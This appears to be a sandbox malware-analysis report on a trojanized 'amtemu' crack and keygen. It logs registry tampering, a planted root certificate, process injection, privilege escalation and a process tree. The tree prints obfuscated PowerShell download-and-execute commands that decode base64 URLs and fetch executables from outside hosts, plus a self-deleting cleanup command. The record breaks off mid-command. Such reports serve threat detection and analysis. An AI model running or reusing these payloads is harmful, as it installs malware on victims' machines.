explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner ⋅ 1 TTPs 1 IoCs
TTPs:
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
TTPs:
Processes:
explorer.exeregedit.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0" regedit.exe -
Modifies registry class ⋅ 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe -
Modifies registry key ⋅ 1 TTPs 3 IoCs
-
Processes:
9Dq25VPs74.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 9Dq25VPs74.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 9Dq25VPs74.exe -
NTFS ADS ⋅ 2 IoCs
Processes:
explorer.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe:150EFC68 explorer.exe File created C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe:150EFC68 explorer.exe -
Runs regedit.exe ⋅ 1 IoCs
Processes:
regedit.exepid process 4804 regedit.exe -
Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
Processes:
Microsoft.VisualStudio.Package.LanguageService.11.0.exedata.datexplorer.exedw20.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exehGSBLC0mMB.exeBKqzN9zoCZ.exeBKqzN9zoCZ.exepid process 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3140 data.dat 3140 data.dat 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1428 dw20.exe 1428 dw20.exe 1288 explorer.exe 1288 explorer.exe 4464 powershell.exe 4464 powershell.exe 556 powershell.exe 556 powershell.exe 556 powershell.exe 4464 powershell.exe 5112 powershell.exe 5112 powershell.exe 4464 powershell.exe 3272 powershell.exe 3272 powershell.exe 556 powershell.exe 5112 powershell.exe 3272 powershell.exe 5112 powershell.exe 3272 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe 4668 powershell.exe 4668 powershell.exe 4668 powershell.exe 4668 powershell.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 4244 hGSBLC0mMB.exe 4244 hGSBLC0mMB.exe 4660 BKqzN9zoCZ.exe 4660 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe -
Suspicious behavior: MapViewOfSection ⋅ 31 IoCs
Processes:
bb.exeexplorer.exeejf.exeFGbfttrev.exeFDvbcgfert.exe9119gy3q5_1.exe333u357995k.exeFDvbcgfert.exeFGbfttrev.exepid process 652 bb.exe 652 bb.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 5096 ejf.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1796 FGbfttrev.exe 4240 FDvbcgfert.exe 1288 explorer.exe 4468 9119gy3q5_1.exe 4468 9119gy3q5_1.exe 1288 explorer.exe 1288 explorer.exe 5252 333u357995k.exe 5404 FDvbcgfert.exe 5888 FGbfttrev.exe -
Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
Processes:
Microsoft.VisualStudio.Package.LanguageService.11.0.exewmic.exebb.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe Token: SeIncreaseQuotaPrivilege 3948 wmic.exe Token: SeSecurityPrivilege 3948 wmic.exe Token: SeTakeOwnershipPrivilege 3948 wmic.exe Token: SeLoadDriverPrivilege 3948 wmic.exe Token: SeSystemProfilePrivilege 3948 wmic.exe Token: SeSystemtimePrivilege 3948 wmic.exe Token: SeProfSingleProcessPrivilege 3948 wmic.exe Token: SeIncBasePriorityPrivilege 3948 wmic.exe Token: SeCreatePagefilePrivilege 3948 wmic.exe Token: SeBackupPrivilege 3948 wmic.exe Token: SeRestorePrivilege 3948 wmic.exe Token: SeShutdownPrivilege 3948 wmic.exe Token: SeDebugPrivilege 3948 wmic.exe Token: SeSystemEnvironmentPrivilege 3948 wmic.exe Token: SeRemoteShutdownPrivilege 3948 wmic.exe Token: SeUndockPrivilege 3948 wmic.exe Token: SeManageVolumePrivilege 3948 wmic.exe Token: 33 3948 wmic.exe Token: 34 3948 wmic.exe Token: 35 3948 wmic.exe Token: 36 3948 wmic.exe Token: SeIncreaseQuotaPrivilege 3948 wmic.exe Token: SeSecurityPrivilege 3948 wmic.exe Token: SeTakeOwnershipPrivilege 3948 wmic.exe Token: SeLoadDriverPrivilege 3948 wmic.exe Token: SeSystemProfilePrivilege 3948 wmic.exe Token: SeSystemtimePrivilege 3948 wmic.exe Token: SeProfSingleProcessPrivilege 3948 wmic.exe Token: SeIncBasePriorityPrivilege 3948 wmic.exe Token: SeCreatePagefilePrivilege 3948 wmic.exe Token: SeBackupPrivilege 3948 wmic.exe Token: SeRestorePrivilege 3948 wmic.exe Token: SeShutdownPrivilege 3948 wmic.exe Token: SeDebugPrivilege 3948 wmic.exe Token: SeSystemEnvironmentPrivilege 3948 wmic.exe Token: SeRemoteShutdownPrivilege 3948 wmic.exe Token: SeUndockPrivilege 3948 wmic.exe Token: SeManageVolumePrivilege 3948 wmic.exe Token: 33 3948 wmic.exe Token: 34 3948 wmic.exe Token: 35 3948 wmic.exe Token: 36 3948 wmic.exe Token: SeDebugPrivilege 652 bb.exe Token: SeRestorePrivilege 652 bb.exe Token: SeBackupPrivilege 652 bb.exe Token: SeLoadDriverPrivilege 652 bb.exe Token: SeCreatePagefilePrivilege 652 bb.exe Token: SeShutdownPrivilege 652 bb.exe Token: SeTakeOwnershipPrivilege 652 bb.exe Token: SeChangeNotifyPrivilege 652 bb.exe Token: SeCreateTokenPrivilege 652 bb.exe Token: SeMachineAccountPrivilege 652 bb.exe Token: SeSecurityPrivilege 652 bb.exe Token: SeAssignPrimaryTokenPrivilege 652 bb.exe Token: SeCreateGlobalPrivilege 652 bb.exe Token: 33 652 bb.exe Token: SeDebugPrivilege 1288 explorer.exe Token: SeRestorePrivilege 1288 explorer.exe Token: SeBackupPrivilege 1288 explorer.exe Token: SeLoadDriverPrivilege 1288 explorer.exe Token: SeCreatePagefilePrivilege 1288 explorer.exe Token: SeShutdownPrivilege 1288 explorer.exe Token: SeTakeOwnershipPrivilege 1288 explorer.exe -
Suspicious use of SetWindowsHookEx ⋅ 13 IoCs
Processes:
data.datKeygen.exeejf.exeFGbfttrev.exeFDvbcgfert.exeabx.exeBKqzN9zoCZ.exe333u357995k.exeFGbfttrev.exeFDvbcgfert.exefYDz9wNnYe.exepid process 3140 data.dat 3684 Keygen.exe 5096 ejf.exe 1796 FGbfttrev.exe 4240 FDvbcgfert.exe 2012 abx.exe 496 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 5252 333u357995k.exe 5888 FGbfttrev.exe 5404 FDvbcgfert.exe 5660 fYDz9wNnYe.exe 5660 fYDz9wNnYe.exe -
Suspicious use of WriteProcessMemory ⋅ 64 IoCs
Processes:
amtemu.v0.9.2.win-painter_edited.execmd.exekey.execmd.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exebb.exebb.exeexplorer.exedescription pid process target process PID 4716 wrote to memory of 1008 4716 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 4716 wrote to memory of 1008 4716 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 4716 wrote to memory of 1008 4716 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 1008 wrote to memory of 3604 1008 cmd.exe key.exe PID 1008 wrote to memory of 3604 1008 cmd.exe key.exe PID 1008 wrote to memory of 3604 1008 cmd.exe key.exe PID 1008 wrote to memory of 2776 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 2776 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 2776 1008 cmd.exe timeout.exe PID 3604 wrote to memory of 4172 3604 key.exe cmd.exe PID 3604 wrote to memory of 4172 3604 key.exe cmd.exe PID 3604 wrote to memory of 4172 3604 key.exe cmd.exe PID 1008 wrote to memory of 3212 1008 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 1008 wrote to memory of 3212 1008 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 1008 wrote to memory of 3212 1008 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 4172 wrote to memory of 4072 4172 cmd.exe attrib.exe PID 4172 wrote to memory of 4072 4172 cmd.exe attrib.exe PID 4172 wrote to memory of 4072 4172 cmd.exe attrib.exe PID 1008 wrote to memory of 3460 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 3460 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 3460 1008 cmd.exe timeout.exe PID 4172 wrote to memory of 3176 4172 cmd.exe find.exe PID 4172 wrote to memory of 3176 4172 cmd.exe find.exe PID 4172 wrote to memory of 3176 4172 cmd.exe find.exe PID 4172 wrote to memory of 4084 4172 cmd.exe find.exe PID 4172 wrote to memory of 4084 4172 cmd.exe find.exe PID 4172 wrote to memory of 4084 4172 cmd.exe find.exe PID 4172 wrote to memory of 3140 4172 cmd.exe data.dat PID 4172 wrote to memory of 3140 4172 cmd.exe data.dat PID 4172 wrote to memory of 3140 4172 cmd.exe data.dat PID 3212 wrote to memory of 3948 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 3212 wrote to memory of 3948 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 3212 wrote to memory of 3948 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 1008 wrote to memory of 4472 1008 cmd.exe bb.exe PID 1008 wrote to memory of 4472 1008 cmd.exe bb.exe PID 1008 wrote to memory of 4472 1008 cmd.exe bb.exe PID 4472 wrote to memory of 652 4472 bb.exe bb.exe PID 4472 wrote to memory of 652 4472 bb.exe bb.exe PID 4472 wrote to memory of 652 4472 bb.exe bb.exe PID 4472 wrote to memory of 652 4472 bb.exe bb.exe PID 4472 wrote to memory of 652 4472 bb.exe bb.exe PID 1008 wrote to memory of 980 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 980 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 980 1008 cmd.exe timeout.exe PID 652 wrote to memory of 1288 652 bb.exe explorer.exe PID 652 wrote to memory of 1288 652 bb.exe explorer.exe PID 652 wrote to memory of 1288 652 bb.exe explorer.exe PID 1008 wrote to memory of 1780 1008 cmd.exe puttty.exe PID 1008 wrote to memory of 1780 1008 cmd.exe puttty.exe PID 1008 wrote to memory of 1780 1008 cmd.exe puttty.exe PID 1008 wrote to memory of 1948 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 1948 1008 cmd.exe timeout.exe PID 1008 wrote to memory of 1948 1008 cmd.exe timeout.exe PID 1288 wrote to memory of 4716 1288 explorer.exe amtemu.v0.9.2.win-painter_edited.exe PID 1288 wrote to memory of 4716 1288 explorer.exe amtemu.v0.9.2.win-painter_edited.exe PID 1288 wrote to memory of 1008 1288 explorer.exe cmd.exe PID 1288 wrote to memory of 1008 1288 explorer.exe cmd.exe PID 1288 wrote to memory of 3604 1288 explorer.exe key.exe PID 1288 wrote to memory of 3604 1288 explorer.exe key.exe PID 1288 wrote to memory of 4172 1288 explorer.exe cmd.exe PID 1288 wrote to memory of 4172 1288 explorer.exe cmd.exe PID 1288 wrote to memory of 3140 1288 explorer.exe data.dat PID 1288 wrote to memory of 3140 1288 explorer.exe data.dat PID 1288 wrote to memory of 1780 1288 explorer.exe puttty.exe -
Views/modifies file attributes ⋅ 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exePID:4716"C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exePID:1008C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D65.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"Checks whether UAC is enabledMaps connected drives based on registrySuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exePID:3604key.exeExecutes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exePID:4172C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t4402.bat" "C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe" "Drops file in Drivers directoryChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exePID:4072attrib +h C:\Users\Admin\AppData\Local\Temp\ytmpViews/modifies file attributes
-
C:\Windows\SysWOW64\find.exePID:3176FIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts
-
C:\Windows\SysWOW64\find.exePID:4084FIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts
-
C:\Users\Admin\AppData\Local\Temp\afolder\data.datPID:3140C:\Users\Admin\AppData\Local\Temp\afolder/data.datExecutes dropped EXELoads dropped DLLAdds Run key to start applicationChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious behavior: EnumeratesProcessesSuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\timeout.exePID:2776TIMEOUT /T 1Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exePID:3212Microsoft.VisualStudio.Package.LanguageService.11.0.exeExecutes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\wmic.exePID:3948"wmic" os get Caption /format:listSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exePID:3460TIMEOUT /T 2Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exePID:4472bb.exeExecutes dropped EXESuspicious use of SetThreadContextSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exePID:652"C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe"Executes dropped EXEChecks whether UAC is enabledSuspicious use of NtSetInformationThreadHideFromDebuggerChecks processor information in registrySuspicious behavior: MapViewOfSectionSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exePID:1288C:\Windows\SysWOW64\explorer.exeModifies firewall policy serviceChecks BIOS information in registryAdds Run key to start applicationDrops desktop.ini file(s)Suspicious use of NtSetInformationThreadHideFromDebuggerChecks processor information in registryEnumerates system info in registryModifies Internet Explorer Protected ModeModifies Internet Explorer Protected Mode BannerModifies Internet Explorer settingsNTFS ADSSuspicious behavior: EnumeratesProcessesSuspicious behavior: MapViewOfSectionSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exePID:4428/suacExecutes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exePID:4468"C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe"Modifies firewall policy serviceExecutes dropped EXEChecks for any installed AV software in registryChecks whether UAC is enabledSuspicious use of NtSetInformationThreadHideFromDebuggerChecks processor information in registrySuspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\regedit.exePID:4804"C:\Windows\SysWOW64\regedit.exe"Modifies security serviceAdds Run key to start applicationModifies Internet Explorer settingsRuns regedit.exe
-
C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exePID:4572"C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exe"Executes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\333u357995k.exePID:5252"C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"Executes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:5888"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:4624"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:5404"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:5284"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXELoads dropped DLLChecks processor information in registry
-
C:\Windows\SysWOW64\cmd.exePID:4788"C:\Windows\System32\cmd.exe" /c taskkill /pid 5284 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\778415280088976\\* & exit
-
C:\Windows\SysWOW64\taskkill.exePID:5552taskkill /pid 5284Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\333u357995k.exePID:3960"C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exePID:980TIMEOUT /T 3Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\puttty.exePID:1780puttty.exeExecutes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exePID:1428dw20.exe -x -s 1532Maps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exePID:1948TIMEOUT /T 4Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6D65.tmp\ereds.exePID:928ereds.exeExecutes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\keygen.exePID:4724"C:\Users\Admin\AppData\Local\Temp\keygen.exe"
-
C:\Windows\SysWOW64\cmd.exePID:5044C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"Checks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerModifies registry class
-
C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\Keygen.exePID:3684Keygen.exeExecutes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exePID:4020"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:4464"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious behavior: EnumeratesProcesses
-
C:\Users\Public\abx.exePID:2012"C:\Users\Public\abx.exe"Executes dropped EXESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exePID:4300"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Checks whether UAC is enabledMaps connected drives based on registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:556"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, 